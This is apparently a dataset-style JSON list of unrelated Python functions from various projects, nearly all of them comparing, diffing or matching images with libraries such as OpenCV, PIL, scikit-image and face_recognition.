[ "def compareTo(self,imagefullpath):\n exc = ExtractColor2(self.k)\n bgrcolor = exc.getColorBGR(imagefullpath)\n\n score = 0\n for i in range(self.k):\n score += np.linalg.norm(bgrcolor[i] - self._ref_BGRcolor[i])/(np.sqrt(255*255*3))\n score /= self.k\n return 1 - score", "def __compareImage(self, file1, file2):\n # arg=self.__validateString(str_arg)\n # file1, file2=arg.split(' ', 1)\n try:\n img1 = Image.open(file1)\n img2 = Image.open(file2)\n if img1.size != img2.size:\n return False\n by1 = img1.tobytes()\n by2 = img2.tobytes()\n # format r,g,b,255,r,g,b,255, 3 bytes = 1 point, 255=separator, total 4 bytes\n l = len(by1) / 4\n # total points and same points\n tp = 0\n sp = 0\n for j in range(l):\n i = j * 4\n tp += 1\n if by1[i] == by2[i] and by1[i + 1] == by2[i + 1] and by1[i + 2] == by2[i + 2]:\n sp += 1\n # max to 2% diff allowed\n if tp * 0.98 > sp:\n return False\n else:\n return True\n except Exception, e:\n printLog(self.threadName + \"Exception in __compareImage: %s\" % e.message, logging.ERROR)\n traceback.print_exc()\n return False\n finally:\n img1 = None\n img2 = None", "def image_comparison(self):\n for result in self.cards:\n if result.image_status:\n return True\n return False", "def compare_images(img1_path, img2_path):\n img1 = Image.open(img1_path)\n img2 = Image.open(img2_path)\n try:\n diff = ImageChops.difference(img1, img2)\n except ValueError:\n return False\n return diff.getbbox() is None", "def __lt__(self, img):\r\n ordering = self.config['algorithm_ordering']\r\n ordering = ordering[1:] if ordering.startswith('-') else ordering\r\n\r\n if ordering == \"filename\":\r\n return sorted([self.filename, img.filename])[0] == img.filename\r\n if ordering == 'width':\r\n return self.absolute_width <= img.absolute_width\r\n elif ordering == 'height':\r\n return self.absolute_height <= img.absolute_height\r\n elif ordering == 'area':\r\n return self.absolute_width * self.absolute_height <= img.absolute_width * img.absolute_height\r\n else:\r\n return max(self.absolute_width, self.absolute_height) <= max(img.absolute_width, img.absolute_height)", "def assert_image_equal(path1, path2):\n test_im = np.asarray(Image.open(path1))\n ref_im = np.asarray(Image.open(path2))\n npt.assert_array_equal(test_im, ref_im)", "def compare(image_a, image_b, is_camera_image):\n\n # Generate a unique filename\n filename = uuid.uuid4().hex[:3]\n\n if is_camera_image:\n image_a = imutils.rotate_bound(image_a, 90)\n image_b = imutils.rotate_bound(image_b, 90)\n\n # Store original to show in future\n original = image_a\n\n # Convert to greyscale\n image_a = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n image_b = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n\n # Reduce size and blur to account for shaky handheld camera based images\n if is_camera_image:\n scale_multiplier = 0.03125\n image_a = cv2.resize(image_a, (0, 0), fx=scale_multiplier, fy=scale_multiplier)\n image_b = cv2.resize(image_b, (0, 0), fx=scale_multiplier, fy=scale_multiplier)\n image_a = cv2.GaussianBlur(image_a, (1001, 1001), cv2.BORDER_DEFAULT)\n image_b = cv2.GaussianBlur(image_b, (1001, 1001), cv2.BORDER_DEFAULT)\n\n # Obtain SSIM and determine differences\n try:\n _, differences = structural_similarity(image_a, image_b, full=True, gaussian_weights=True)\n except ValueError:\n print('Images are not the same size')\n return None\n\n # Convert to cv2 array\n differences = (differences * 255).astype('uint8')\n\n # Threshold and find contours (differences)\n thresh = cv2.threshold(differences, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(contours)\n\n # Draw contours (differences)\n for cont in contours:\n (x, y, w, h) = cv2.boundingRect(cont)\n if is_camera_image:\n multiplier = int(1 / scale_multiplier)\n y *= multiplier\n x *= multiplier\n h *= multiplier\n w *= multiplier\n cv2.rectangle(original, (x, y), (x + w, y + h), (255, 0, 0), 4)\n\n # TODO: Create GIF highlighting differences (instead of statuic image)\n cv2.imwrite('static/images/differences/' + filename + '.jpg', original)\n\n return filename", "def compare_images(self, img1, img2):\n if self.debug:\n cv2.imshow('img1', img1)\n cv2.imshow('img2', img2)\n cv2.waitKey(5)\n time.sleep(2)\n\n # find the mean squared difference between the images\n # http://www.pyimagesearch.com/2014/09/15/python-compare-two-images/\n err = np.sum((img1.astype('float') - img2.astype('float')) ** 2)\n err /= float(img1.shape[0] * img2.shape[1])\n\n # lower is more similar (better)\n return err", "def look_for_reference_image(image):\n match_list = []\n thresh = 8\n final_value = -1\n references = import_reference_images()\n # Initialize the ORB detector algorithm\n orb = cv2.ORB_create()\n\n # Now detect the keypoints and compute\n # the descriptors for the query image\n imgKeypoints, imgDescriptors = orb.detectAndCompute(image, None)\n try:\n for ref in references:\n # Now detect the keypoints and compute\n # the descriptors for the train image\n ref.refKeypoints, ref.refDescriptors = orb.detectAndCompute(ref.img, None)\n\n # Initialize the Matcher for matching\n # the keypoints and then match the\n # keypoints\n matcher = cv2.BFMatcher()\n matches = matcher.knnMatch(imgDescriptors, ref.refDescriptors, k=2)\n\n for m, n in matches:\n if m.distance < 0.75 * n.distance:\n ref.refMatches.append([m])\n\n match_list.append(len(ref.refMatches))\n except:\n pass\n if len(match_list) != 0:\n if max(match_list) > thresh:\n final_value = match_list.index(max(match_list))\n\n return references[final_value].name", "def compare_images(first_img_path, second_img_path):\n img1 = Image.open(first_img_path)\n img2 = Image.open(second_img_path)\n\n diff = ImageChops.difference(img1, img2)\n print(diff.getbbox())", "def img_compare(file1, file2):\n # read image\n img1 = Image.open(file1)\n img2 = Image.open(file2)\n\n # resize \n size = 128, 128\n img1_res = img_resize(img1, size)\n img2_res = img_resize(img2, size)\n\n img1_res.save(\"img_1.thumbnail\", \"JPEG\")\n img2_res.save(\"img_2.thumbnail\", \"JPEG\")\n\n # convert to gray scale\n img1_grayscale = img1_res.convert('LA')\n img1_grayscale.save(\"img_1_grayscale.png\")\n\n img2_grayscale = img2_res.convert('LA')\n img2_grayscale.save(\"img_2_grayscale.png\")\n\n # normalise\n img1_norm = normalize(np.array(img1_grayscale.getdata()).astype(float))\n img2_norm = normalize(np.array(img2_grayscale.getdata()).astype(float))\n\n try:\n # compare two images\n diff = img1_norm - img2_norm\n m_norm = sum(abs(diff)) # Manhattan norm\n z_norm = norm(diff.ravel(), 0) # Zero norm\n\n # print(\"Manhattan norm:\", m_norm, \"/ per pixel:\", m_norm/img1_norm.size)\n # print(\"Zero norm:\", z_norm, \"/ per pixel:\", z_norm*1.0/img1_norm.size)\n\n return m_norm/img1_norm.size, float(z_norm) / img1_norm.size\n except:\n return 100, 100", "def compare_images(img1, img2):\n #normalize scene pixel values\n img1_mean = img1.mean() \n img1_std = img1.std()\n for i in np.nditer(img1, op_flags=['readwrite']):\n i[...] = (i-img1_mean)/img1_std\n\n #normalize template pixel values\n img2_mean = img2.mean() \n img2_std = img2.std()\n for i in np.nditer(img2, op_flags=['readwrite']):\n i[...] = (i-img2_mean)/img2_std\n\n #sums error\n error_array = img1 - img2\n error_array = error_array.astype(np.int8)\n ss_error = 0\n for i in np.nditer(error_array):\n ss_error += abs(i/255.0)**0.5\n #print ss_error\n return ss_error", "def __diff_image(self):\n img = cv2.imread(self.imagefile()).copy()\n Reference.__draw_bugs(img, self.__true_positives, False, 1)\n Reference.__draw_bugs(img, self.__false_negatives, (0, 255, 0))\n Reference.__draw_bugs(img, self.__false_positives, (0, 0, 255))\n return img", "def diff_image_feature(image0, image1):\n return 0", "def compare_images(im1, im2):\n errors = (im1 - im2) / 255\n return np.mean(np.square(errors))", "def img_compare(A, B):\r\n A = cv2.GaussianBlur(A, (5, 5), 5)\r\n B = cv2.GaussianBlur(B, (5, 5), 5)\r\n diff = cv2.absdiff(A, B) # absolute difference\r\n _, diff = cv2.threshold(diff, 200, 255, cv2.THRESH_BINARY)\r\n return np.sum(diff)", "def getImageDiff(referenceFrame, frame):\n return cv2.absdiff(referenceFrame, frame)", "def compare_img(img1, img2, err_function=\"ALL\"):\n\n # make sure images are the same shape #\n height1, width1, height2, width2 = img1.shape[0], img1.shape[1], img2.shape[0], img2.shape[1]\n if img1.shape != img2.shape:\n if width1 * height1 > width2 * height2:\n img1 = resize_image(img1, width2, height2)\n else:\n img2 = resize_image(img2, width1, height1)\n # TODO: create better resize to avoid interpolation when possible\n # compare images#\n func_arr = [mse, ssim, L1_norm]\n err_arr = []\n for func in func_arr:\n if err_function == \"ALL\" or func.__name__.upper() == err_function:\n err_arr.append(func(img1, img2))\n return np.array(err_arr)", "def diff_image(images):\n prev_image = cv2.absdiff(images[0], images[1])\n cur_image = cv2.absdiff(images[1], images[2])\n return cv2.bitwise_and(prev_image, cur_image)", "def compare_images(image1, image2, method='diff', *, n_tiles=(8, 8)):\n if image1.shape != image2.shape:\n raise ValueError('Images must have the same shape.')\n\n img1 = img_as_float(image1)\n img2 = img_as_float(image2)\n\n if method == 'diff':\n comparison = np.abs(img2 - img1)\n elif method == 'blend':\n comparison = 0.5 * (img2 + img1)\n elif method == 'checkerboard':\n shapex, shapey = img1.shape\n mask = np.full((shapex, shapey), False)\n stepx = int(shapex / n_tiles[0])\n stepy = int(shapey / n_tiles[1])\n for i, j in product(range(n_tiles[0]), range(n_tiles[1])):\n if (i + j) % 2 == 0:\n mask[i * stepx:(i + 1)*stepx, j * stepy:(j + 1) * stepy] = True\n comparison = np.zeros_like(img1)\n comparison[mask] = img1[mask]\n comparison[~mask] = img2[~mask]\n else:\n raise ValueError('Wrong value for `method`. '\n 'Must be either \"diff\", \"blend\" or \"checkerboard\".')\n return comparison", "def cs4243_histmatch(ori_image, refer_image):\n \n ##your code here ###\n\n # get cdf of ori and ref image\n grey_level = 256\n ori_hist, ori_cum_hist, ori_res_image, ori_uni_hist = cs4243_histequ(ori_image, grey_level)\n ref_hist, ref_cum_hist, ref_res_image, ref_uni_hist = cs4243_histequ(refer_image, grey_level)\n \n # map each ori cdf to ref cdf and get the mapped index as matched grey level\n map_value = []\n for i in range(grey_level):\n ori_cdf = ori_cum_hist[i]\n matched_intensity = np.uint8(np.abs(ref_cum_hist - ori_cdf).argmin())\n map_value.append(matched_intensity)\n ##\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist", "def are_compatible_imgs(one_img, another_img):\n return have_same_shapes(one_img, another_img)", "def equals(self, image: 'BaseImage') -> bool:\n assert isinstance(image, BaseImage)\n im1 = pygame.image.tostring(self._surface, 'RGBA')\n im2 = pygame.image.tostring(image._surface, 'RGBA')\n return im1 == im2", "def compare_images(self):\r\n m = round(self.mse(self.image_a, self.image_b), 4)\r\n s = round(ssim(self.image_a, self.image_b) * 100, 5)\r\n return (\r\n m, s)", "def is_equal(image_a, image_b, tolerance=0.0):\n return image_diff_percent(image_a, image_b) <= tolerance", "def image_reference(self, image_id):\n pass", "def apply_and_compare(self, image1_data, image2_data):\n\n return self.transformations_map[self.name](image1_data, image2_data)", "def is_different(image1, image2):\n gray1 = cv2.cvtColor(image1, cv2.COLOR_RGB2GRAY)\n gray2 = cv2.cvtColor(image2, cv2.COLOR_RGB2GRAY)\n\n (score, diff) = compare_ssim(gray1, gray2, full=True)\n diff = (diff * 255).astype(\"uint8\")\n\n thresh = cv2.threshold(diff, 0, 255,\n cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n return bool(cnts)", "def compare_faces(\n id_image: bytes,\n cam_image: np.ndarray,\n face_location: List[Tuple[int, ...]],\n save_dest: Union[Path, None] = None,\n) -> bool:\n im1 = bytes_to_np(id_image)\n im1 = im1[:, :, ::-1]\n id_face_loc = get_bounding_boxes(im1)\n im1 = im1[:, :, ::-1]\n face_encodings = face_recognition.face_encodings(im1, id_face_loc, 10, \"large\")[0]\n\n im2 = cam_image[:, :, ::-1]\n face_encodings2 = face_recognition.face_encodings(im2, face_location, 10, \"large\")[0]\n\n if save_dest:\n Image.fromarray(im1).save(os.path.join(save_dest, \"face_one.jpeg\"))\n Image.fromarray(im2).save(os.path.join(save_dest, \"face_two.jpeg\"))\n\n dist = face_recognition.face_distance([face_encodings], face_encodings2)[0]\n print(\"[i] Decision threshold is 0.5.\")\n if dist <= 0.5:\n print(\n f\"[+] Distance between the images is {dist}\"\n \"\\n[+] These images are of the same people!\"\n )\n return True\n else:\n print(\n f\"[-] Distance between the images is {dist}\\n\"\n \"[-] These images are of two different people!\"\n )\n return False", "def compare_image_buffers(imgbuf1, imgbuf2):\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()", "def create_comparison_image(edge_images):\n if edge_images[0].size == edge_images[1].size:\n height, width = edge_images[0].shape\n overlap_image_a = np.zeros((height, width, 3), np.uint8)\n overlap_image_b = np.zeros((height, width, 3), np.uint8)\n contours, _ = cv2.findContours(edge_images[0], cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contours_b, _ = cv2.findContours(edge_images[1], cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # We could also only compare the n largest contours\n # cnts = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n # cnts_b = sorted(contours_b, key=cv2.contourArea, reverse=True)[:10]\n # Draw the contours red for image_aw\n cv2.drawContours(overlap_image_a, contours, -1, (0, 0, 255), 3)\n # Draw the contours green for image_b\n cv2.drawContours(overlap_image_b, contours_b, -1, (0, 255, 0), 3)\n comparison_image = overlap_image_a + overlap_image_b\n return comparison_image\n else:\n return None", "def matchShapesImages(img1, img2):\n\tcnt1 = findContours(img1)[0]\n\tcnt2 = findContours(img2)[0]\n\tret = cv2.matchShapes(cnt1, cnt2, 1, 0.0)\n\treturn ret", "def compare_image_hashes(image_hash, potential_duplicate_hash):\n\n return image_hash - potential_duplicate_hash < image_hash_comparison_cutoff", "def _diff_images(img_before, img_after):\n width_before, height_before = img_before.size\n width_after, height_after = img_after.size\n data_before = img_before.getdata()\n data_after = img_after.getdata()\n\n width, height = max(width_before, width_after), max(height_before, height_after)\n offset_ax = (width - width_before) // 2\n offset_ay = (height - height_before) // 2\n offset_bx = (width - width_after) // 2\n offset_by = (height - height_after) // 2\n\n diff = 0\n for y in range(height):\n for x in range(width):\n ax, ay = x - offset_ax, y - offset_ay\n bx, by = x - offset_bx, y - offset_by\n if (ax < 0 or bx < 0 or ax >= width_before or bx >= width_after or\n ay < 0 or by < 0 or ay >= height_before or by >= height_after):\n diff += 1\n else:\n if data_before[ax + ay *width_before] != data_after[bx + by * width_after]:\n diff += 1\n try:\n return round(diff / float(width * height), 4)\n except ZeroDivisionError:\n return 0.0", "def assert_image(visual, img, img_name, expected_image_filename, expected_result='equal', threshold=0):\n # Save result image in output folder\n result_file = os.path.join(visual.output_directory, f'{img_name}.png')\n img.save(result_file)\n\n # Output image and expected image must be equal\n expected_image = os.path.join(root_path, 'resources', f'{expected_image_filename}.png')\n compare_image_files(visual, previous_method_name(), result_file, expected_image, expected_result, threshold)", "def test_make_mask_w_ref_image(self):\n output_mask = instance_mask(\n os.path.join(data_dir, 'geotiff_labels.geojson'),\n reference_im=os.path.join(data_dir, 'sample_geotiff.tif'),\n do_transform=True,\n out_file=os.path.join(data_dir, 'test_out.tif')\n )\n truth_mask = skimage.io.imread(os.path.join(data_dir,\n 'sample_inst_mask.tif'))\n saved_output_mask = skimage.io.imread(os.path.join(data_dir,\n 'test_out.tif'))\n\n assert np.array_equal(saved_output_mask, truth_mask)\n # clean up\n os.remove(os.path.join(data_dir, 'test_out.tif'))\n assert np.array_equal(output_mask, truth_mask)", "def compare(actor, frame):\n urlretrieve(actor, 'actor.jpg')\n\n with open(\"frame_image.jpg\", 'wb') as frame_image:\n frame_image.write(base64.b64decode(frame[23:]))\n\n actor_encoding = face_encodings(load_image_file('actor.jpg'))[0]\n frame_encoding = face_encodings(load_image_file('frame_image.jpg'))\n\n os.remove('actor.jpg')\n os.remove('frame_image.jpg')\n for encoding in frame_encoding:\n if compare_faces([actor_encoding], encoding):\n return True\n return False", "def what_image_is_this(self, captured_image, reference_images_dictionary, respawn_filter=False):\n matched_array = []\n captured_image_list = captured_image.tolist()\n total = {}\n\n apply_respawn_filter = hasattr(self, 'respawnFilter') and respawn_filter\n\n for item_name, reference_image in reference_images_dictionary.items():\n total[item_name] = 0\n row = 0\n for reference_row in reference_image: # captured_image must not be larger than any reference image\n pixel = 0\n for reference_pixel in reference_row:\n skip = False\n # print(\"Reference Pixel: \" + str(reference_pixel) +\n # \" Captured Pixel: \" + str(captured_image_list[row][pixel][0]))\n if apply_respawn_filter: # apply filter when respawning\n if self.respawnFilter[\"respawn-filter\"][row][pixel] == 0:\n # filter out this pixel, it could be red or white and will be covering the hero\n skip = True\n if not skip:\n total[item_name] += 1\n if reference_pixel == captured_image_list[row][pixel][0]:\n matched_array.append(item_name)\n pixel = pixel + 1\n row = row + 1\n counter = Counter(matched_array)\n most_common = counter.most_common()\n ratios = {}\n for item in most_common:\n ratios[item[0]] = item[1] / total[item[0]]\n return ratios", "def image_comparison(unaligned_image_ccd_lst,aligned_image_ccd_lst,stacked_img_ccd,outputs_path,obsdate):\n source_hdu = CCDData(unaligned_image_ccd_lst[0],unit='adu')\n source_image_hdr = source_hdu.header\n run_filename = source_image_hdr['RUN'].strip(' ')\n target_name = source_image_hdr['FIELD'].strip(' ')\n exptime = source_image_hdr['EXPTIME']\n chip_num = source_image_hdr['CHIP']\n \n # compare unaligned vs aligned images\n for i, unaligned_img in enumerate(unaligned_image_ccd_lst[1:]):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10), tight_layout=True)\n \n # source_hdu = CCDData(unaligned_image_ccd_lst[0],unit='adu')\n image_hdr = unaligned_img.header\n run_filename = image_hdr['RUN'].strip(' ')\n target_name = image_hdr['FIELD'].strip(' ')\n exptime = image_hdr['EXPTIME']\n chip_num = image_hdr['CHIP']\n \n show_image(unaligned_img, cmap='gray', ax=ax1, fig=fig, percl=90)\n ax1.set_title('Unaligned Image for {}-{}-{}-{}s ({})'.format(run_filename,target_name,chip_num,exptime,obsdate))\n \n show_image(aligned_image_ccd_lst[i], cmap='gray', ax=ax2, fig=fig, percl=90)\n ax2.set_title('Aligned Image for {}-{}-{}-{}s ({})'.format(run_filename,target_name,chip_num,exptime,obsdate))\n \n plt.savefig(outputs_path/\"unaligned_vs_aligned_{}-{}-{}-{}.jpg\".format(run_filename,target_name,chip_num,exptime),dpi=900)\n plt.show()\n \n # compare source image to stacked image\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10), tight_layout=True)\n \n show_image(unaligned_image_ccd_lst[0], cmap='gray', ax=ax1, fig=fig, percl=90)\n ax1.set_title('Unaligned Source Image for {}-{}-{}s ({})'.format(target_name,chip_num,exptime,obsdate))\n \n show_image(stacked_img_ccd, cmap='gray', ax=ax2, fig=fig, percl=90)\n ax2.set_title('Aligned Stacked Image for {}-{}-{}s ({})'.format(target_name,chip_num,exptime,obsdate))\n \n plt.savefig(outputs_path/\"source_vs_stacked_{}-{}-{}.jpg\".format(target_name,chip_num,exptime),dpi=900)\n plt.show()", "def diff_image_color(image_path0, image_path1):\n image0 = Image.open(image_path0)\n #color_image0 = get_histogram(image0)\n color_image0 = image0.histogram()\n cut_color_image0 = cut_histogram_min(color_image0)\n image1 = Image.open(image_path1)\n color_image1 = image1.histogram()\n #color_image1 = get_histogram(image1)\n cut_color_image1 = cut_histogram_min(color_image1)\n color_difference = bhattacharyya(color_image0, color_image1)\n return color_difference", "def findMatchesBetweenImages(image_1, image_2):\n # matches - type: list of cv2.DMath\n matches = None\n # image_1_kp - type: list of cv2.KeyPoint items.\n image_1_kp = None\n # image_1_desc - type: numpy.ndarray of numpy.uint8 values.\n image_1_desc = None\n # image_2_kp - type: list of cv2.KeyPoint items.\n image_2_kp = None\n # image_2_desc - type: numpy.ndarray of numpy.uint8 values.\n image_2_desc = None\n # WRITE YOUR CODE HERE.\n\n sift = cv2.ORB_create()\n image_1_kp, image_1_desc = sift.detectAndCompute(image_1, None)\n image_2_kp, image_2_desc = sift.detectAndCompute(image_2, None)\n\n # bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n # matches = bf.match(image_1_desc, image_2_desc)\n # matches = sorted(matches, key = lambda x:x.distance)\n # matches = matches[:10]\n\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(image_1_desc, image_2_desc, k=2)\n\n # Apply ratio test\n good = []\n for m, n in matches:\n print(m.distance, n.distance, m.distance < .75*n.distance)\n if m.distance < (0.75 * n.distance):\n good.append([m])\n\n # We coded the return statement for you. You are free to modify it -- just\n # make sure the tests pass.\n print(len(good), good)\n return image_1_kp, image_2_kp, matches\n # END OF FUNCTION.", "def compare_images(self, df):\n score_list = []\n elapsed_list = []\n for index,row in df.iterrows():\n start_time = time.time()\n image1 = imread(row['image1'],as_gray=\"True\")\n image2 = imread(row['image2'],as_gray=\"True\")\n if(image1.shape != image2.shape):\n image2 = resize(image2, (image1.shape)) # if images are of different dimensions, crop the second image based on first\n score = structural_similarity(image1, image2)\n new_score = self.__convert_similarity_score(score)\n elapsed_time = (time.time() - start_time)\n score_list.append(round(new_score,2))\n elapsed_list.append(elapsed_time)\n output_df = self.__create_output_csv(df, score_list, elapsed_list)\n return output_df", "def __eq__(*args, **kwargs):\n return _gdi_.Bitmap___eq__(*args, **kwargs)", "def compare_cpes(lhs: ImageCpe, rhs: ImageCpe):\n vendor_cmp = compare_fields(lhs.vendor, rhs.vendor)\n if vendor_cmp != 0:\n return vendor_cmp\n\n name_cmp = compare_fields(lhs.name, rhs.name)\n if name_cmp != 0:\n return name_cmp\n\n version_cmp = compare_fields(lhs.version, rhs.version)\n if version_cmp != 0:\n return version_cmp\n\n update_cmp = compare_fields(lhs.update, rhs.update)\n if update_cmp != 0:\n return update_cmp\n\n meta_cmp = compare_fields(lhs.meta, rhs.meta)\n if meta_cmp != 0:\n return meta_cmp\n\n # all avenues of comparison have been depleted, the two cpes are same for all practical purposes\n return 0", "def __eq__(self, other):\n if not isinstance(other, ImageInfo):\n return False\n\n return self.__dict__ == other.__dict__", "def mostrar_imagem_equalizada(self):\n self.imagem_core.equalizar_imagem()\n self.recarregar_imagem()", "def _compare_jpg_decode_with_pil(test_case, images, print_debug_info=False):\n of_decoded_images = _of_image_decode(images)\n pil_images = [Image.open(image) for image in images]\n # convert image to BGR\n pil_decoded_images = [np.array(image)[:, :, ::-1] for image in pil_images]\n\n for of_decoded_image, pil_decoded_image in zip(\n of_decoded_images, pil_decoded_images\n ):\n of_decoded_image = of_decoded_image.squeeze()\n test_case.assertTrue(len(of_decoded_image.shape) == 3)\n test_case.assertTrue(len(pil_decoded_image.shape) == 3)\n\n diff = of_decoded_image - pil_decoded_image\n diff_index = np.where(diff != 0)\n diff_abs_values = diff[diff_index]\n\n if print_debug_info:\n print(\"of_decoded_image:\\n\", of_decoded_image, of_decoded_image.shape)\n print(\"pil_decoded_image:\\n\", pil_decoded_image, pil_decoded_image.shape)\n print(\"diff_index:\\n\", diff_index)\n print(\"diff_abs_values:\\n\", diff_abs_values)\n print(\n \"of_decoded_image diff:\\n\",\n of_decoded_image[diff_index[0], diff_index[1]],\n )\n print(\n \"pil_decoded_image diff:\\n\",\n pil_decoded_image[diff_index[0], diff_index[1]],\n )\n\n # only green channel has difference of 1\n test_case.assertTrue(np.all(diff_index[-1] == 1))\n test_case.assertTrue(np.all(diff_abs_values == 1))", "def similarity_two_images_color(img1: np.ndarray, img2: np.ndarray) -> np.ndarray:\n hist_image_1 = histogram_of_image_color(img1, HIST_BINS_INTENSITY, BIN_DIFFERENCE_INTENSITY_HALF)\n hist_image_2 = histogram_of_image_color(img2, HIST_BINS_INTENSITY, BIN_DIFFERENCE_INTENSITY_HALF)\n max_difference = max(2 * np.sum(hist_image_1), 2 * np.sum(hist_image_2))\n return 100 - 100 * np.sum(np.absolute(hist_image_1 - hist_image_2)) / max_difference", "def verify_image(self, image_location):\n checksum = self._hash_algo.hexdigest()\n LOG.debug('Verifying image at %(image_location)s against '\n '%(algo_name)s checksum %(checksum)s',\n {'image_location': image_location,\n 'algo_name': self._hash_algo.name,\n 'checksum': checksum})\n if checksum != self._expected_hash_value:\n error_msg = errors.ImageChecksumError.details_str.format(\n image_location, self._image_info['id'],\n self._expected_hash_value, checksum)\n LOG.error(error_msg)\n raise errors.ImageChecksumError(image_location,\n self._image_info['id'],\n self._expected_hash_value,\n checksum)", "def test_RGB_mode():\n\n model = Instafilter(\"Lo-Fi\")\n\n f_image = __local__ / \"Normal.jpg\"\n\n img1 = model(f_image)\n img2 = model(f_image, is_RGB=True)\n\n diff = (img1 - img2).sum()\n\n assert abs(diff) > 0", "def magick_compare(self) -> None:\n # Make diff images\n if len(self.clips) > 2:\n Status.fail(f'{self.__class__.__name__}: \"magick_compare\" can only be used with two clips!', exception=ValueError)\n\n self.path_diff = self.path / 'diffs'\n try:\n subprocess.call(['magick', 'compare'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)\n self.path_diff.mkdir(parents=True)\n except FileNotFoundError as file_not_found:\n Status.fail(\n f'{self.__class__.__name__}: \"magick compare\" was not found!',\n exception=FileNotFoundError, chain_err=file_not_found\n )\n except FileExistsError as file_err:\n Status.fail(\n f'{self.__class__.__name__}: {self.path_diff.to_str()} already exists!',\n exception=FileExistsError, chain_err=file_err\n )\n\n all_images = [sorted((self.path / name).glob('*.png')) for name in self.clips.keys()]\n images_a, images_b = all_images\n\n cmds = [\n f'magick compare \"{i1.to_str()}\" \"{i2.to_str()}\" '\n + f'\"{self.path_diff.to_str()}/diff_' + f'{f}'.zfill(len(\"%i\" % self.max_num)) + '.png\"'\n for i1, i2, f in zip(images_a, images_b, self.frames)\n ]\n\n # Launch asynchronously the Magick commands\n Status.info('Diffing clips...')\n print()\n SubProcessAsync(cmds)", "def checkImages(self):\r\n\r\n self.leftImage, self.rightImage, res = self.receiver.getImageData()\r\n\r\n return res", "def compare_images(originalImg, modifiedImg):\n fig, axes = plt.subplots(nrows=1, ncols=2, sharex='all', sharey='all',dpi=144)\n # ax = axes.ravel()\n\n psnr_orig = msr.compare_psnr(originalImg, originalImg)\n ssim_orig = msr.compare_ssim(\n originalImg, originalImg, multichannel=True)\n\n psnr_mod = msr.compare_psnr(originalImg, modifiedImg)\n ssim_mod = msr.compare_ssim(\n originalImg, modifiedImg, multichannel=True)\n\n label = 'PSNR: {:.2f}, SSIM: {:.2f}'\n\n axes[0].imshow(originalImg, cmap=plt.cm.gray)\n axes[0].set_xlabel(label.format(psnr_orig, ssim_orig))\n axes[0].set_title('Original image')\n\n axes[1].imshow(modifiedImg, cmap=plt.cm.gray)\n axes[1].set_xlabel(label.format(psnr_mod, ssim_mod))\n axes[1].set_title('Modified image')\n\n plt.show()", "def assert_img_equal(request):\n\n testname = request.node.name\n filename = Path(request.module.__file__)\n test_dir = filename.parent / filename.stem\n test_dir.mkdir(exist_ok=True)\n\n def _img_equal(img, index=0):\n expected_file = test_dir / f\"{testname}_{index}.png\"\n actual_file = test_dir / f\"{testname}_{index}_actual.png\"\n if img.ndim == 2:\n cv2.imwrite(str(actual_file), img)\n else:\n img_bgr = img.copy()\n img_bgr[..., :3] = img_bgr[..., :3][..., ::-1]\n cv2.imwrite(str(actual_file), img_bgr) # img is RGB, imwrite expects BGR\n\n if not expected_file.exists():\n raise AssertionError(\n f\"{expected_file} does not exist! Check newly produced img with a command like:\\n\\n feh {actual_file}\\n\\n\"\n )\n\n try:\n pytest.helpers.assert_img_equal(expected_file, img)\n except Exception as e:\n raise AssertionError(f\"{expected_file} differs from {actual_file}\") from e\n\n return _img_equal", "def compare_files(_img1, _img2, _network, verbose=False):\n \n face_dsts = []\n \n descs1 = calculate_embeddings_from_buffer(_img1, _network, verbose=verbose)\n descs2 = calculate_embeddings_from_buffer(_img2, _network, verbose=verbose)\n\n for desc1 in descs1:\n (emb1, det1) = (desc1.emb, desc1.det)\n for desc2 in descs2:\n (emb2, det2) = (desc2.emb, desc2.det)\n (dist, match_faces) = compare_embeddings(emb1, emb2)\n face_dsts.append((dist, match_faces, det1, det2))\n \n return face_dsts", "def same_landmark_images(path_1: str, path_2: str) -> float:\n img_1_greyscale = read_image_greyscale(path_1)\n img_2_greyscale = read_image_greyscale(path_2)\n img_1_rgb_separated = np.array([read_image_color(path_1, component) for component in RGB_COMPONENTS])\n img_2_rgb_separated = np.array([read_image_color(path_2, component) for component in RGB_COMPONENTS])\n\n similarity_hog = similarity_two_images_hog(img_1_greyscale, img_2_greyscale)\n similiarities_rgb = np.array([similarity_two_images_color(img_1_rgb_separated[i], img_2_rgb_separated[i])\n for i in range(0, len(RGB_COMPONENTS))])\n similarity_color = np.mean(similiarities_rgb)\n\n similarity_percentage = np.average([similarity_hog, similarity_color], weights=[1.2, 1])\n return float(similarity_percentage)", "def compare(model, input1, input2): \n patch_image_time_start = time.time()\n input1_patches = get_patches_non_overlap(input1, 48, 48)\n input2_patches = get_patches_non_overlap(input2, 48, 48)\n patch_image_time_end = time.time()\n compare_image_time_start = time.time()\n pred = model.predict([input1_patches, input2_patches])\n compare_image_time_end = time.time()\n\n result[\"patch_retrieval_time\"].append(patch_image_time_end - patch_image_time_start)\n result[\"image_comparison_time\"].append(compare_image_time_end - compare_image_time_start)\n\n 